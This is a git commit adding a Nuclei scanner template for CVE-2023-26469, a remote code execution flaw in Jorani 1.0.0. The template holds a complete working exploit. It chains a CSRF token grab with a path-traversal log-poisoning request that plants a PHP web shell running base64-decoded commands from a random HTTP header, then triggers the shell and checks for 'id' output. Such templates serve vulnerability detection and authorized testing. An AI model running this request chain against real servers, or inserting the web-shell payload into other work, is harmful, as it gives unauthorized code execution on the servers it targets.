Merge pull request #8117 from projectdiscovery/pussycat0x-patch-2

CVE-2023-26469
2023-08-31 10:59:55 +05:30 · 2023-08-31 10:59:55 +05:30 · f05664f53e
parent 51731aba50 12c478a2c8
commit f05664f53e
1 changed files with 70 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
@ -0,0 +1,70 @@
+id: CVE-2023-26469
+
+info:
+  name: Jorani 1.0.0 - Remote Code Execution
+  author: pussycat0x
+  severity: critical
+  description: |
+     Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-26469
+    - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
+    - https://github.com/advisories/GHSA-7r9h-9r47-7vjj
+    - http://packetstormsecurity.com/files/174248/Jorani-Remote-Code-Execution.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-22
+    epss-score: 0.22328
+    cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:*
+  metadata:
+    max-request: 3
+    shodan-query: http.favicon.hash:-2032163853
+    verified: true
+  tags: cve,cve2023,jorani,rce,packetstorm
+
+variables:
+  cmd: "id"
+  payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){system(base64_decode($_SERVER['HTTP_{{header}}']));} ?>"
+  header: "{{to_upper(rand_base(12))}}"
+
+http:
+  - raw:
+      - |
+        GET /session/login HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /session/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword
+
+      - |
+        GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
+        Host: {{Hostname}}
+        X-REQUESTED-WITH: XMLHttpRequest
+        {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_3
+        regex:
+          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)'
+
+      - type: status
+        part: header_3
+        status:
+          - 401
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        internal: true
+        name: csrf
+        regex:
+          - 'name="csrf_test_jorani" value="(.*?)"'